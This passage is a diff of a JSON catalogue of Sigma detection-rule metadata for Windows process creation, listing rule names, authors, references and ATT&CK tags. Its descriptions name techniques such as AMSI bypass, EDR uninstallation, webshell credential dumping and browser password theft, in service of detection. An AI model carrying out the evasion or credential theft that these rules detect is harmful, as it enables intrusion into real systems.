- "creation_date": "2021/07/12", - "falsepositive": [ - "Uninstall by admin" - ], - "filename": "proc_creation_win_uninstall_crowdstrike_falcon.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uninstall_crowdstrike_falcon.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ] - }, - "uuid": "f0f7be61-9cf5-43be-9836-99d6ef448a18", - "value": "Uninstall Crowdstrike Falcon" - }, - { - "description": "Detects the uninstallation of Sysinternals Sysmon, which could be the result of legitimate administration or a manipulation for defense evasion", - "meta": { - "author": "frack113", - "creation_date": "2022/01/12", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_uninstall_sysmon.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md#atomic-test-11---uninstall-sysmon", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uninstall_sysmon.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ] - }, - "uuid": "6a5f68d1-c4b5-46b9-94ee-5324892ea939", - "value": "Uninstall Sysinternals Sysmon" - }, - { - "description": "Detects an unexpected process spawning from dns.exe which may indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)", - "meta": { - "author": "Tim Rauch", - "creation_date": "2022/09/27", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_unusual_child_process_of_dns_exe.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.elastic.co/guide/en/security/current/unusual-child-process-of-dns.exe.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_unusual_child_process_of_dns_exe.yml" + "https://twitter.com/1ZRR4H/status/1534259727059787783", + "https://app.any.run/tasks/e1fe6a62-bce8-4323-a49a-63795d9afd5d/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_archiver_iso_phishing.yml" ], "tags": [ "attack.initial_access", - "attack.t1133" + "attack.t1566" ] }, - "uuid": "a4e3d776-f12e-42c2-8510-9e6ed1f43ec3", - "value": "Unusual Child Porcess of dns.exe" + "uuid": "fcdf69e5-a3d3-452a-9724-26f2308bf2b1", + "value": "Phishing Pattern ISO in Archive" }, { - "description": "Detects suspicious parent process for cmd.exe", + "description": "Detects use of Cobalt Strike commands accidentally entered in the CMD shell", "meta": { - "author": "Tim Rauch", - "creation_date": "2022/09/21", + "author": "_pete_0, TheDFIRReport", + "creation_date": "2022/05/06", "falsepositive": [ "Unknown" ], - "filename": "proc_creation_win_unusual_parent_for_cmd.yml", - "level": "medium", + "filename": "proc_creation_win_cobaltstrike_bloopers_cmd.yml", + "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.elastic.co/guide/en/security/current/unusual-parent-process-for-cmd.exe.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_unusual_parent_for_cmd.yml" + "https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/cobalt-4-5-user-guide.pdf", + "https://thedfirreport.com/2022/06/16/sans-ransomware-summit-2022-can-you-detect-this/", + "https://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cobaltstrike_bloopers_cmd.yml" ], "tags": [ "attack.execution", - "attack.t1059" + "attack.t1059.003" ] }, - "uuid": "4b991083-3d0e-44ce-8fc4-b254025d8d4b", - "value": "Unusual Parent Process for cmd.exe" + "uuid": "647c7b9e-d784-4fda-b9a0-45c565a7b729", + "value": "Operator Bloopers Cobalt Strike Commands" }, { - "description": "Detects usage of the Get-ADUser cmdlet to collect user information and output it to a file", + "description": "Detects suspicious command lines used in Covenant luanchers", "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/09/09", - "falsepositive": [ - "Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often" + "author": "Florian Roth, Jonhnathan Ribeiro, oscd.community", + "creation_date": "2020/06/04", + "falsepositive": "No established falsepositives", + "filename": "proc_creation_win_susp_covenant.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://posts.specterops.io/covenant-v0-5-eee0507b85ba", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_covenant.yml" ], - "filename": "proc_creation_win_user_discovery_get_aduser.yml", + "tags": [ + "attack.execution", + "attack.defense_evasion", + "attack.t1059.001", + "attack.t1564.003" + ] + }, + "uuid": "c260b6db-48ba-4b4a-a76f-2f67644e99d2", + "value": "Covenant Launcher Indicators" + }, + { + "description": "Detects command that is used to disable or delete Windows eventlog via logman Windows utility", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/02/11", + "falsepositive": [ + "Legitimate deactivation by administrative staff", + "Installer tools that disable services, e.g. before log collection agent installation" + ], + "filename": "proc_creation_win_susp_disable_eventlog.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://ss64.com/nt/logman.html", + "https://twitter.com/0gtweet/status/1359039665232306183?s=21", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_disable_eventlog.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001", + "attack.t1070.001" + ] + }, + "uuid": "cd1f961e-0b96-436b-b7c6-38da4583ec00", + "value": "Disable or Delete Windows Eventlog" + }, + { + "description": "Detects attempts to disable AMSI in the command line. It is possible to bypass AMSI by disabling it before loading the main payload.", + "meta": { + "author": "@Kostastsale", + "creation_date": "2022/11/04", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_psh_amsi_bypass_pattern_nov22.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_psh_amsi_bypass_pattern_nov22.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001", + "attack.execution" + ] + }, + "uuid": "4f927692-68b5-4267-871b-073c45f4f6fe", + "value": "PowerShell AMSI Bypass Pattern" + }, + { + "description": "Detects Formbook like process executions that inject code into a set of files in the System32 folder, which executes a special command command line to delete the dropper from the AppData Temp folder. We avoid false positives by excluding all parent process with command line parameters.", + "meta": { + "author": "Florian Roth, oscd.community, Jonhnathan Ribeiro", + "creation_date": "2019/09/30", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_malware_formbook.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://app.any.run/tasks/8e22486b-5edc-4cef-821c-373e945f296c/", + "https://inquest.net/blog/2018/06/22/a-look-at-formbook-stealer", + "https://app.any.run/tasks/62bb01ae-25a4-4180-b278-8e464a90b8d7/", + "https://app.any.run/tasks/388d5802-aa48-4826-b069-250420504758/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_formbook.yml" + ], + "tags": [ + "attack.resource_development", + "attack.t1587.001" + ] + }, + "uuid": "032f5fb3-d959-41a5-9263-4173c802dc2b", + "value": "Formbook Process Creation" + }, + { + "description": "Detects a tscon.exe start as LOCAL SYSTEM", + "meta": { + "author": "Florian Roth", + "creation_date": "2018/03/17", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_tscon_localsystem.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6", + "http://www.korznikov.com/2017/03/0-day-or-feature-privilege-escalation.html", + "https://www.ired.team/offensive-security/lateral-movement/t1076-rdp-hijacking-for-lateral-movement", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_tscon_localsystem.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1219" + ] + }, + "uuid": "9847f263-4a81-424f-970c-875dab15b79b", + "value": "Suspicious TSCON Start as SYSTEM" + }, + { + "description": "Extexport.exe loads dll and is execute from other folder the original path", + "meta": { + "author": "frack113", + "creation_date": "2021/11/26", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbin_extexport.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", - "https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_user_discovery_get_aduser.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1033" - ] - }, - "uuid": "1114e048-b69c-4f41-bc20-657245ae6e3f", - "value": "User Discovery And Export Via Get-ADUser Cmdlet" - }, - { - "description": "Detection of sc.exe utility spawning by user with Medium integrity level to change service ImagePath or FailureCommand", - "meta": { - "author": "Teymur Kheirkhabarov", - "creation_date": "2019/10/26", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_using_sc_to_change_sevice_image_path_by_non_admin.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment", - "https://pentestlab.blog/2017/03/30/weak-service-permissions/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_using_sc_to_change_sevice_image_path_by_non_admin.yml" - ], - "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.011" - ] - }, - "uuid": "d937b75f-a665-4480-88a5-2f20e9f9b22a", - "value": "Possible Privilege Escalation via Weak Service Permissions" - }, - { - "description": "Detection of sc.exe utility adding a new service with special permission which hides that service.", - "meta": { - "author": "Andreas Hunkeler (@Karneades)", - "creation_date": "2021/12/20", - "falsepositive": [ - "Rare intended use of hidden services" - ], - "filename": "proc_creation_win_using_sc_to_hide_sevices.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://blog.talosintelligence.com/2021/10/threat-hunting-in-large-datasets-by.html", - "https://www.sans.org/blog/red-team-tactics-hiding-windows-services/", - "https://twitter.com/Alh4zr3d/status/1580925761996828672", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_using_sc_to_hide_sevices.yml" - ], - "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.011" - ] - }, - "uuid": "a537cfc3-4297-4789-92b5-345bfd845ad0", - "value": "Abuse of Service Permissions to Hide Services in Tools" - }, - { - "description": "Detects usage of the \"Set-Service\" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as \"sc.exe\", \"Get-Service\"...etc. (Works only in powershell 7)", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/10/17", - "falsepositive": [ - "Rare intended use of hidden services" - ], - "filename": "proc_creation_win_using_set_service_to_hide_services.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/Alh4zr3d/status/1580925761996828672", - "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/set-service?view=powershell-7.2", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_using_set_service_to_hide_services.yml" - ], - "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.011" - ] - }, - "uuid": "514e4c3a-c77d-4cde-a00f-046425e2301e", - "value": "Abuse of Service Permissions to Hide Services Via Set-Service" - }, - { - "description": "Detects when verclsid.exe is used to run COM object via GUID", - "meta": { - "author": "Victor Sergeev, oscd.community", - "creation_date": "2020/10/09", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_verclsid_runs_com.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Verclsid/", - "https://gist.github.com/NickTyrer/0598b60112eaafe6d07789f7964290d5", - "https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_verclsid_runs_com.yml" + "https://lolbas-project.github.io/lolbas/Binaries/Extexport/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_extexport.yml" ], "tags": [ "attack.defense_evasion", "attack.t1218" ] }, - "uuid": "d06be4b9-8045-428b-a567-740a26d9db25", - "value": "Verclsid.exe Runs COM Object" + "uuid": "fb0b815b-f5f6-4f50-970f-ffe21f253f7a", + "value": "Suspicious Extexport Execution" }, { - "description": "Detects suspicious child process creations of VMware Tools process which may indicate persistence setup", + "description": "Adversaries may abuse msiexec.exe to proxy execution of malicious payloads.\nMsiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi)\n", "meta": { - "author": "behops, Bhabesh Raj", - "creation_date": "2021/10/08", + "author": "frack113", + "creation_date": "2022/01/16", "falsepositive": [ - "Legitimate use by administrator" + "Legitimate script" ], - "filename": "proc_creation_win_vmtoolsd_susp_child_process.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://bohops.com/2021/10/08/analyzing-and-detecting-a-vmtools-persistence-technique/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_vmtoolsd_susp_child_process.yml" - ], - "tags": [ - "attack.execution", - "attack.persistence", - "attack.t1059" - ] - }, - "uuid": "5687f942-867b-4578-ade7-1e341c46e99a", - "value": "VMToolsd Suspicious Child Process" - }, - { - "description": "Detects a JAVA process running with remote debugging allowing more than just localhost to connect", - "meta": { - "author": "Florian Roth", - "creation_date": "2019/01/16", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_vul_java_remote_debugging.yml", + "filename": "proc_creation_win_msiexec_install_quiet.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://dzone.com/articles/remote-debugging-java-applications-with-jdwp", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_vul_java_remote_debugging.yml" + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec", + "https://twitter.com/_st0pp3r_/status/1583914244344799235", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msiexec_install_quiet.yml" ], "tags": [ - "attack.t1203", - "attack.execution" + "attack.defense_evasion", + "attack.t1218.007" ] }, - "uuid": "8f88e3f6-2a49-48f5-a5c4-2f7eedf78710", - "value": "Java Running with Remote Debugging" + "uuid": "79a87aa6-e4bd-42fc-a5bb-5e6fbdcd62f5", + "value": "Suspicious Msiexec Quiet Install" }, { - "description": "When configured with suitable command line arguments, w32tm can act as a delay mechanism", + "description": "Detects RunDLL32.exe spawning explorer.exe as child, which is very uncommon, often observes Gamarue spawning the explorer.exe process in an unusual way", "meta": { - "author": "frack113", - "creation_date": "2022/09/25", + "author": "elhoim, CD_ROM_", + "creation_date": "2022/04/27", "falsepositive": [ - "Legitimate use" + "Unknown" ], - "filename": "proc_creation_win_w32tm.yml", + "filename": "proc_creation_win_susp_rundll32_spawn_explorer.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/d0dad62dbcae9c60c519368e82c196a3db577055/atomics/T1124/T1124.md", - "https://blogs.blackberry.com/en/2022/05/dirty-deeds-done-dirt-cheap-russian-rat-offers-backdoor-bargains", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_w32tm.yml" + "https://redcanary.com/blog/intelligence-insights-november-2021/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rundll32_spawn_explorer.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.011" + ] + }, + "uuid": "caa06de8-fdef-4c91-826a-7f9e163eef4b", + "value": "RunDLL32 Spawning Explorer" + }, + { + "description": "Detects the execution of whoami that has been renamed to a different name to avoid detection", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/08/12", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_renamed_whoami.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://app.any.run/tasks/7eaba74e-c1ea-400f-9c17-5e30eee89906/", + "https://brica.de/alerts/alert/public/1247926/agent-tesla-keylogger-delivered-inside-a-power-iso-daa-archive/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_whoami.yml" ], "tags": [ "attack.discovery", - "attack.t1124" + "attack.t1033", + "car.2016-03-001" ] }, - "uuid": "6da2c9f5-7c53-401b-aacb-92c040ce1215", - "value": "Use of W32tm as Timer" + "uuid": "f1086bf7-a0c4-4a37-9102-01e573caf4a0", + "value": "Renamed Whoami Execution" }, { - "description": "Detects execution of wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) from non default locations as seen with bumblebee activity", + "description": "Detects ADDInternals Cmdlet execution. A tool for administering Azure AD and Office 365. Which can be abused by threat actors to attack Azure AD or Office 365.", "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/08/12", + "author": "Austin Songer (@austinsonger), Nasreddine Bencherchali (update)", + "creation_date": "2022/12/23", "falsepositive": [ - "Unknown" + "Legitimate use of the library for administrative activity" ], - "filename": "proc_creation_win_wab_execution_from_non_default_location.yml", + "filename": "proc_creation_win_aadinternals_cmdlets_execution.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bumblebee-loader-cybercrime", - "https://thedfirreport.com/2022/09/26/bumblebee-round-two/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wab_execution_from_non_default_location.yml" + "https://github.com/Gerenios/AADInternals", + "https://o365blog.com/aadinternals/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_aadinternals_cmdlets_execution.yml" ], "tags": [ - "attack.defense_evasion", - "attack.execution" + "attack.execution", + "attack.reconnaissance", + "attack.discovery", + "attack.credential_access", + "attack.impact" ] }, - "uuid": "395907ee-96e5-4666-af2e-2ca91688e151", - "value": "Wab Execution From Non Default Location" + "uuid": "c86500e9-a645-4680-98d7-f882c70c1ea3", + "value": "AADInternals PowerShell Cmdlets Execution - ProccessCreation" }, { - "description": "Detects unusual parent or children of the wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) processes as seen being used with bumblebee activity", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/08/12", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_wab_unusual_parents.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bumblebee-loader-cybercrime", - "https://thedfirreport.com/2022/09/26/bumblebee-round-two/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wab_unusual_parents.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.execution" - ] - }, - "uuid": "63d1ccc0-2a43-4f4b-9289-361b308991ff", - "value": "Wab/Wabmig Unusual Parent Or Child Processes" - }, - { - "description": "Detects weak passwords or often abused passwords (seen used by threat actors) via the CLI. An example would be a threat actor creating a new user via the net command and providing the password inline", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/09/14", - "falsepositive": [ - "Legitimate usage of the passwords by users via commandline (should be discouraged)", - "Other currently unknown false positives" - ], - "filename": "proc_creation_win_weak_or_abused_passwords.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments", - "https://thedfirreport.com/2022/09/26/bumblebee-round-two/", - "https://www.microsoft.com/en-us/security/blog/2022/10/25/dev-0832-vice-society-opportunistic-ransomware-campaigns-impacting-us-education-sector/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_weak_or_abused_passwords.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.execution" - ] - }, - "uuid": "91edcfb1-2529-4ac2-9ecc-7617f895c7e4", - "value": "Weak or Abused Passwords In CLI" - }, - { - "description": "Detect use of WebBrowserPassView.exe", + "description": "Detect use of X509Enrollment", "meta": { "author": "frack113", - "creation_date": "2022/08/20", + "creation_date": "2022/12/23", "falsepositive": [ - "Legitimate use" + "Legitimate administrative script" ], - "filename": "proc_creation_win_webbrowserpassview.yml", + "filename": "proc_creation_win_x509enrollment.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1555.003/T1555.003.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_webbrowserpassview.yml" + "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=41", + "https://learn.microsoft.com/en-us/dotnet/api/microsoft.hpc.scheduler.store.cx509enrollmentwebclassfactoryclass?view=hpc-sdk-5.1.6115", + "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=42", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_x509enrollment.yml" ], - "tags": [ - "attack.credential_access", - "attack.t1555.003" - ] + "tags": "No established tags" }, - "uuid": "d0dae994-26c6-4d2d-83b5-b3c8b79ae513", - "value": "Launch WebBrowserPassView Executable" + "uuid": "114de787-4eb2-48cc-abdb-c0b449f93ea4", + "value": "Suspicious X509Enrollment - Process Creation" }, { - "description": "Detects patterns found in process executions cause by China Chopper like tiny (ASPX) webshells", + "description": "Detects suspicious print spool service (spoolsv.exe) child processes.", "meta": { - "author": "Florian Roth (rule), MSTI (query)", - "creation_date": "2022/10/01", + "author": "Justin C. (@endisphotic), @dreadphones (detection), Thomas Patzke (Sigma rule)", + "creation_date": "2021/07/11", "falsepositive": [ "Unknown" ], - "filename": "proc_creation_win_webshell_chopper.yml", + "filename": "proc_creation_win_susp_spoolsv_child_processes.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.microsoft.com/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_webshell_chopper.yml" + "https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries/blob/efa17a600b43c897b4b7463cc8541daa1987eeb4/Exploits/Print%20Spooler%20RCE/Suspicious%20Spoolsv%20Child%20Process.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_spoolsv_child_processes.yml" ], "tags": [ - "attack.persistence", - "attack.t1505.003", - "attack.t1018", - "attack.t1033", - "attack.t1087" + "attack.execution", + "attack.t1203", + "attack.privilege_escalation", + "attack.t1068" ] }, - "uuid": "fa3c117a-bc0d-416e-a31b-0c0e80653efb", - "value": "Chopper Webshell Process Pattern" + "uuid": "dcdbc940-0bff-46b2-95f3-2d73f848e33b", + "value": "Suspicious Spool Service Child Process" }, { - "description": "Detects certain command line parameters often used during reconnaissance activity via web shells", + "description": "Detects rundll32 execution where the DLL is located on a remote location (share)", "meta": { - "author": "Florian Roth, Jonhnathan Ribeiro, Anton Kutepov, oscd.community", - "creation_date": "2017/01/01", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_webshell_detection.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-ii.html", - "https://unit42.paloaltonetworks.com/bumblebee-webshell-xhunt-campaign/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_webshell_detection.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1505.003", - "attack.t1018", - "attack.t1033", - "attack.t1087" - ] - }, - "uuid": "bed2a484-9348-4143-8a8a-b801c979301c", - "value": "Webshell Detection With Command Line Keywords" - }, - { - "description": "Detects certain parent child patterns found in cases in which a webshell is used to perform certain credential dumping or exfiltration activities on a compromised system", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/03/17", + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/10", "falsepositive": [ "Unlikely" ], - "filename": "proc_creation_win_webshell_hacking.yml", + "filename": "proc_creation_win_rundll32_unc_path.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://youtu.be/7aemGhaE9ds?t=641", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_webshell_hacking.yml" + "https://www.cybereason.com/blog/rundll32-the-infamous-proxy-for-executing-malicious-code", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_unc_path.yml" ], "tags": [ - "attack.persistence", - "attack.t1505.003", - "attack.t1018", - "attack.t1033", - "attack.t1087" + "attack.defense_evasion", + "attack.execution", + "attack.t1021.002", + "attack.t1218.011" ] }, - "uuid": "4ebc877f-4612-45cb-b3a5-8e3834db36c9", - "value": "Webshell Hacking Activity Patterns" + "uuid": "5cdb711b-5740-4fb2-ba88-f7945027afac", + "value": "Rundll32 UNC Path Execution" }, { - "description": "Detects processes spawned from web servers (php, tomcat, iis...etc) that perform reconnaissance looking for the existence of popular scripting tools (perl, python, wget) on the system via the help commands", + "description": "Detects non-interactive PowerShell activity by looking at powershell.exe with not explorer.exe as a parent.", "meta": { - "author": "Cian Heasley, Florian Roth", - "creation_date": "2020/07/22", + "author": "Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements)", + "creation_date": "2019/09/12", "falsepositive": [ - "Unknown" + "Legitimate programs executing PowerShell scripts" ], - "filename": "proc_creation_win_webshell_recon_detection.yml", - "level": "high", + "filename": "proc_creation_win_non_interactive_powershell.yml", + "level": "low", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://ragged-lab.blogspot.com/2020/07/webshells-automating-reconnaissance.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_webshell_recon_detection.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1505.003" - ] - }, - "uuid": "f64e5c19-879c-4bae-b471-6d84c8339677", - "value": "Webshell Recon Detection Via CommandLine & Processes" - }, - { - "description": "Detects web servers that spawn shell processes which could be the result of a successfully placed web shell or another attack", - "meta": { - "author": "Thomas Patzke, Florian Roth, Zach Stanford @svch0st, Tim Shelton, Nasreddine Bencherchali (update)", - "creation_date": "2019/01/16", - "falsepositive": [ - "Particular web applications may spawn a shell process legitimately" - ], - "filename": "proc_creation_win_webshell_spawn.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_webshell_spawn.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1505.003", - "attack.t1190" - ] - }, - "uuid": "8202070f-edeb-4d31-a010-a26c72ac5600", - "value": "Shells Spawned by Web Servers" - }, - { - "description": "Detects the use of various web request commands with commandline tools and Windows PowerShell cmdlets (including aliases)", - "meta": { - "author": "James Pemberton / @4A616D6573", - "creation_date": "2019/10/24", - "falsepositive": [ - "Use of Get-Command and Get-Help modules to reference Invoke-WebRequest and Start-BitsTransfer." - ], - "filename": "proc_creation_win_web_request_cmd_and_cmdlets.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://4sysops.com/archives/use-powershell-to-download-a-file-with-http-https-and-ftp/", - "https://blog.jourdant.me/post/3-ways-to-download-files-with-powershell", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_web_request_cmd_and_cmdlets.yml" + "https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190410151110.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_non_interactive_powershell.yml" ], "tags": [ "attack.execution", "attack.t1059.001" ] }, - "uuid": "9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d", - "value": "Usage Of Web Request Commands And Cmdlets" + "uuid": "f4bbd493-b796-416e-bbf2-121235348529", + "value": "Non Interactive PowerShell" }, { - "description": "Detects usage of the wevtutil utility to perform reconnaissance", + "description": "Detects execution of renamed paexec via 